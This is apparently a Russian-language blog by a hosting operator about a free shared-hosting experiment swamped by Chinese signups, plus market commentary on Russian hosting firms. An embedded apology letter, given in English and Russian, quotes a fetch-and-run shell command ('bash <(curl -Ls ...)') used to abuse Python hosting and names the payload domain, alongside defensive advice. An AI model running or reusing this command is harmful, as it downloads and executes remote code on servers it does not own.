а столетних то бу серверов с 1 ТБ озу - просто нету, оказывается из-за старости они либо 96 максимум давали, либо 384

хотел тут старье прикупить
чисто под бесплатный хостинг
помните китайцы забили ОЗУ питоном
поэтому новая версия бесплатного хостинга — самые жирные озу серверы
но для бесплатного шареда можно то и старые процессоры купить

и вот оказалось что 1 ТБ это форм фактор не 10 летней давности
а скорее годов так после 2018 или даже после 2020

нашел еще в тикетах, оказывается еще вчера написал челик который и распространил

начало интересного случая с дырявой ISPmanager
hosting.show/alice2k-hosting/dlya-kitaycev-nuzhno-sobirat-1-tb-ozu-servery-pohozhe-no-k-sozhaleniyu-takih-staryh-i-nenuzhnyh-poka-esche-net-no-v-2030-budut.html

I am writing to take full responsibility for the recent wave of service abuse that has impacted your platform. I am the person who initiated this situation.

Initially, I discovered a method that allowed for arbitrary command execution using Python on your servers. Without considering the potential consequences, I shared this finding within an online community. I severely underestimated the impact this would have, and I never intended for it to lead to widespread malicious activity.

To mitigate any further damage, I have now deleted all the content I posted regarding this method. I want to express my deepest and most sincere apologies for the significant disruption and trouble this has caused.

In an effort to help you secure your platform and make amends, I am providing a detailed analysis of the exploit and a set of actionable recommendations to block this and similar attacks in the future.

Technical Analysis and Recommendations

The attack relies on the ability to download and execute a remote shell script from within a user’s process. The core command being used is: bash <(curl -Ls [REMOTE_SCRIPT_URL]).

Here are several layered defense strategies to prevent this:

Immediate Mitigation: Network Egress Filtering

This is the fastest way to stop the current attack.

Action:
Block Specific Domain: Use your firewall to block all outbound traffic to the domain main.ssss.nyc.mn.
Default Deny Policy (Best Practice): Block all outbound internet access by default and only whitelist essential domains. This prevents attackers from simply moving their script to a new domain.

Core Solution: Restrict the Execution Environment

This is the fundamental, long-term solution.

Action:
Disable Dangerous Functions: In your Python environment, disable dangerous modules like subprocess, os.system, os.popen, etc.
Use Secure Sandboxing: Run user code within a heavily restricted sandbox (e.g., Docker with strict seccomp and AppArmor/SELinux profiles, or technologies like gVisor). The process should run as a low-privilege, non-root user.

Detection and Monitoring

This allows you to detect and respond to threats in real-time.

Action:
Monitor Process Creation: Log and alert whenever a user’s process spawns a shell or network utility (e.g., /bin/bash, curl, wget).
Monitor Network Connections: Log all outbound connections and alert on traffic to suspicious or unknown destinations.

Summary of Recommendations

Strategy: 1. Network Filtering
Implementation Method: Firewall rules to block specific outbound domains/IPs.
Impact: Immediate. Stops the current attack vector.

Strategy: 2. Environment Hardening
Implementation Method: Disable dangerous functions, use sandboxing (Docker, gVisor).
Impact: Strategic. The most robust long-term solution.

Strategy: 3. Detection & Monitoring
Implementation Method: Log and alert on suspicious process/network activity.
Impact: Proactive. Provides visibility for rapid response.

I once again apologize for my irresponsible actions. I hope this technical information is useful for your team and helps you strengthen your platform’s security.

Sincerely,

Я пишу, чтобы взять на себя полную ответственность за недавнюю волну злоупотреблений сервисами, которая затронула вашу платформу. Я являюсь лицом, инициировавшим эту ситуацию.

Изначально я обнаружил метод, позволяющий выполнять произвольные команды с использованием Python на ваших серверах. Не оценивая возможные последствия, я поделился этим открытием в онлайн-сообществе. Я сильно недооценил последствия этого и никогда не подразумевал, что это приведет к широкому распространению вредоносной активности.

Чтобы минимизировать дальнейший ущерб, я удалил весь опубликованный мной контент, касающийся этого метода. Хочу принести свои глубочайшие и самые искренние извинения за значительные сбои и проблемы, которые это вызвало.

Чтобы помочь вам защитить вашу платформу и исправить ситуацию, я предоставляю подробный анализ эксплойта и набор практических рекомендаций по блокированию этой и подобных атак в будущем.

Технический анализ и рекомендации

Атака основана на возможности загрузки и выполнения удаленного скрипта оболочки из процесса пользователя. Основная используемая команда: bash <(curl -Ls [URL_УДАЛЁННОГО_СКРИПТ]).

Вот несколько многоуровневых стратегий защиты для предотвращения этого:

Немедленное смягчение: Фильтрация исходящего сетевого трафика

Это самый быстрый способ остановить текущую атаку.

Действие:
Блокировка определённого домена: Используйте брандмауэр для блокировки всего исходящего трафика в домен main.ssss.nyc.mn.
Политика запрета по умолчанию (рекомендуемая практика): Блокируйте весь исходящий интернет-доступ по умолчанию и добавляйте в белый список только необходимые домены. Это не позволит злоумышленникам просто перенести свой скрипт в новый домен.

Основное решение: Ограничьте среду выполнения

Это фундаментальное долгосрочное решение.

Действие:
Отключите опасные функции: В вашей среде Python отключите опасные модули, такие как subprocess, os.system, os.popen и т. д.
Используйте безопасную песочницу: запускайте пользовательский код в строго ограниченной песочнице (например, Docker со строгими профилями seccomp и AppArmor/SELinux, или такими технологиями, как gVisor). Процесс должен запускаться от имени пользователя с низкими привилегиями, не являющегося пользователем root.

Обнаружение и мониторинг

Это позволяет обнаруживать угрозы и реагировать на них в режиме реального времени.

Действие:
Мониторинг создания процессов: регистрируйте и оповещайте о каждом запуске пользовательским процессом оболочки или сетевой утилиты (например, /bin/bash, curl, wget).

Мониторинг сетевых подключений: регистрируйте все исходящие соединения и оповещайте о трафике, направленном на подозрительные или неизвестные адреса.

Резюме рекомендаций

Стратегия: 1. Фильтрация сети
Метод реализации: правила брандмауэра для блокировки определенных исходящих доменов/IP-адресов.
Воздействие: немедленное. Блокирует текущий вектор атаки.

Стратегия: 2. Укрепление среды
Метод реализации: Отключение опасных функций, использование изолированной среды (Docker, gVisor).
Воздействие: Стратегическое. Наиболее надёжное долгосрочное решение.

Стратегия: 3. Обнаружение и мониторинг
Метод реализации: Регистрация и оповещение о подозрительной активности процесса/сети.
Воздействие: Проактивное. Обеспечивает прозрачность для быстрого реагирования.

Ещё раз прошу прощения за свои безответственные действия. Надеюсь, эта техническая информация будет полезна вашей команде и поможет вам укрепить безопасность вашей платформы.

С уважением,

для китайцев нужно собирать 1 ТБ озу серверы похоже - но к сожалению таких старых и ненужных ПОКА ЕЩЕ НЕТ, но в 2030 будут

короче кто-то прорекламировал в китай-нете мой бесплатный хостинг очередную попытку, прошлые бесплатные я закрывал из-за никому ненужности много раз на протяжении 15 лет
который не пользовался спросом и 10 человек может быть отсилы им пользовались

и случился наплыв регистраций
ранее уже было что-то такое, под XRAY VPN
но там было человек 20-30 с китая не более

в тот раз я пытался залимитировать какой-то Xray но не удалось
пришлось просто из тех 30 человек забанить половину и все

в этот раз зарегистрировалось аж почти 2000 человек






собственно ISPmanager не смогла даже создать 500 аккаунтов и уже зависла сразу померла
но в этот раз китайцы устанавливали Питон приложения или Node-JS приложения
hosting.show/alice2k-hosting/u-ispmanager-snova-utechki-bagov---limity-v-paneli-ne-rabotayut.html

сначала я подумал что это клоны и боты
но нет, это все реальные люди
и даже часть из них потом после регистрации когда поняла что «нихуя бесплатный хостинг не выдается»
просто хотела удалить свой аккаунт
23 человека хотели удалиться


в данном случае мой бесплатный хостинг с 32 озу серверами бомжами от ОВХ по 10 евро или 128 озу даже ненужным на коло в москве — не справился с задачей
я бы раздал каждому китайцу по 100 мегабайт на 1 аккаунт ISPmanager — мне не жалко
но как мы поняли — ISPmanager не умеет лимитировать ОЗУ

поэтому теперь останется ждать когда старые серверы на 768 озу или даже 1 ТБ — станут морально старые и гнилые
и потом когда-ниб
мы еще вернемся к бесплатному хостингу для китайцев

если бы биллинг умел в аналитику

я бы узнал откуда они пришли
но к сожалению понятия не имею где кинули ссылку на мой проект

Tilda Publishing победила даже reg.ru

увидел новость


т.к. у меня не одного отказа и потери не произошло
НО У МЕНЯ И НЕ БЫЛО САЙТОВ ))
поэтому меня сравнивать бессмысленно было бы изначально только тупой может подумать что я конкурент рег-ру

так вот, но мне все же стало интересно напиздели ли они или нет
и пошел проверил







да хетзнер и овх действительно упали на несколько строчек вниз
но я бы не сказал что это прямо какой-то резкий потоп как они описывают
вообще под сайты похуистов с лапками ЛЮБАЯ БЛЯТЬ компания подойдет — ибо нагрузок там нет

но зато я заметил другое
РЕГ-ру были на втором месте
но стали на 4-ом

они потеряли даже в условиях тотального ущемления зарубежных игроков
о чем это говорит? хуево работают.

Конструкторы сайтов — победили все хостинги
Вот истина которую они почему-то не заметили и не написали в аналитику
Тильда — второе место
Только лидер шареда в РФ все еще держится, но скорее всего он тоже проиграет в ближайшие годы

профильные услуги не умеют продавать ?

очень странная и абсолютно не типичная новость пришла спамом
hosting.kitchen/edgecenter-ru/podklyuchayte-hosting-na-platforme-edgecentr.html

в 2025 году, когда шаред умер ну например в 2011 году он умер морально сгнил, когда в моду пошли контейнеры ISPmanager VPS
так вот кто-то на полном серьезе запускает шаред хостинг в 2025 году )

и это вовсе не устаревание душой
hostsuki.pro/search/topics/?q=%D1%83%D1%81%D1%82%D0%B0%D1%80%D0%B5%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5+%D0%B4%D1%83%D1%88%D0%BE%D0%B9
потому что продукт то крутой CDN дедики куча локаций и городов
какой нахуй шаред?

или может все таки руководитель сменился и можно написать топик «устаревание душой №4»?

работает пока не сгорит, даже среди "шаредов" такое бывает

казалось бы шаред хостинг это именно 90% администрирования и обслуживания и ЮЛ и Офисов и сотрудников на режиме
т.е. одно дело продать дедик на авсось кому-то на самообслуживание
другое дело делать шаред хостинг где нужно именно следить хостеру, вместо клиентов

но нет, шареды тоже погибают по той же самой массовой причине "смена цикла"

увидел новость что best-hoster не может уже неделю поднять файлы с дисков
searchengines.guru/ru/forum/1118028#unread

что еще интересно
чтобы иметь стойку серверов или может быть там даже несколько стоек было
достаточно одной сети
потому что это «шаред»


что мне это напомнило?
напомнило 2009 год и мажордомо
hostsuki.pro/all/majordomo-imel-dlya-menya-osoboe-znachenie.html
да, в 2009 тоже был «такой же цикл» перерождения
hosting.show/alice2k-hosting/15-let-proshlo-kak-ya-reshil-pointeresovatsya-hostingom-kuda-zhe-menya-eto-zavelo-.html
hosting.show/alice2k-hosting/po-i-dedik.html
hosting.show/qa/kleymo-hosting-dlya-loha-mini-istoriya.html
hosting.show/alice2k-hosting/pochemu-delat-shared-na-dedike-bomzhe-bylo-kruto-let-5-nazad-.html

я тоже сделаю очередной шаред «пока не сгорит», когда будут первые партии ненужного железа копиться в наших стойках
hosting.show/alice2k-hosting/shared-hosting-kotoryy-ebet-mozgi-vechno-i-vsyu-zhizn-pridumal-chto-posle-2025-vse-zhe-sdelayu-esche-odnu-popytku.html

казалось бы спринтхост был как спейсвеб или таймвеб, но видимо НЕТ

вот всякие там старички шаред хостингов 2005-2014 годы
они все для меня на одно лицо
модель на лоха, модель слабых ресурсов, модель выставления лимитов, модель поддержки что клиент тупее чем сотрудник хостера и ничего не умеет и ему обязательно нужно платное администрирование тд тд

но вот если посмотреть на их новости
похоже у них даже DCImanager нету, да и банально дедики не продаются в каком-ниб биллинге
похоже они как и reg.ru когда-то давно(в 2018 например около того) — продают дедики без ПУ, продают дедики вручную, ОС наверно там тоже ставится вручную

вот новость
hosting.kitchen/sprinthost/platim-za-vydelennye-servery.html

что вы видим?
форму заказа по email


на их сайте что видим? тоже самое
sprinthost.ru/tariffs/dedicated


можно ли считать, что спринтхостинг проиграл таймвебу который раскидывается баблом и пытается изменить восприятие бренда на облачные услуги
в чем же была их ошибка?
было мало клиентов?
если рег-ру развился за счет доменов с такой-то базой
то откуда бабки у таймвеба образовались это вообще странно, неужели столько много денег они собрали на шаред хостинге в прошлом? возможно именно поэтому они тянули до самого конца и доили почти 10 лет, ведь другие запускать облака начали еще с 2013 ну или 2015 хотя бы, а они только после 2022 года начали что-то там мутить. видимо действительно была настолько огромная база хостинга сайтов что потери или убыль не ощущалась финансово столько лет
таймвеб или регру не стали делать ребрендинг под «новые продукты», они предпочли отмыться от клейма

почему спринтхост не пытается как таймвеб?
или текущее положение спринтхостинга это как раз то, о чем я рассказываю? «работает пока не сгорит»? наверно так? но тогда какие у них новые проекты? оставлять что-то работает пока не сгорит — правильно, но когда проект достигает логического завершения, оставляешь его работать пока не сгорит, а сам в это время создаешь С НУЛЯ уже новые. но спринтхостинг ничего нового не создает. так что это не совсем то, что я описываю по фразе «работает пока не сгорит».

короче есть над чем подумать.

Шаред хостинг который ебет мозги вечно и всю жизнь - придумал что после 2025 все же сделаю еще одну попытку

Короче к 2025 году будет много «своего железа» валяться то там, то там.
А значит цена этих достаточно еще мощных серверов даже для 2025 — будет стоить 2000/3000р/мес
А значит можно будет попробовать сделать новый эксперимент — бесплатный шаред хостинг. Но с жесткой модерацией. Если чувак далбоеб или похуист — двери для таких закрыты. А кто именно следит за своими сайтами — тот пользуется.
Но главный вопрос, а зачем бесплатно? Ведь за 10 лет на шареде сколько ты не пытался так и не рубля и не заработал. А вот именно поэтому. В 2025 году я думаю, будет такое время, что если кто-то вообще в здравом рассудке будет делать шаред — то это будет преследовать иные цели, например зачистить рынок, задемпинговать, или просто ради саморекламы, но никак не ради заработка. Если на аренда серверах можно было покупать только все же бюджетные дедики, а мощные прямо лютые стоили уже 20к месяц, то за счет «остатков которые накопятся к 2025» можно будет делать уже лютые и дешевые. А значит появится возможность сделать то, что любит клиент — качественно и дешево. Ну и в любом случае спустя 5 лет после закрытия последнего шареда(2020) — думаю будет весело открыть еще разок прикола ради.

почему делать шаред на дедике бомже было круто лет 5 назад ?

потому что можно было за 10 евро купить 2 ТБ диск
и посадить туда 10 человек
и забить на них — они годами просто работали, зарастали спамом, прочее
на ВДС — у них бы быстро «создание запроса в ТП у меня что-то не работает ибо логами забилось»



10 лет прошло
аудитория людей шареда — не меняется
ШАРЕД ЭТО КЛЕЙМО
ШАРЕД ЭТО ГРУППА КРОВИ В ИНТЕРНЕТЕ
ШАРЕД ЭТО РУСССКИЙ МИР КОТОРЫЙ НЕ МЕНЯЕТСЯ

ps
2013г
obzor.ly/2013/10/obzor-togo-chto-ne-stoit-delat-na-vds/
перечитать в 2022 СУКА НАСТАЛЬГИЯ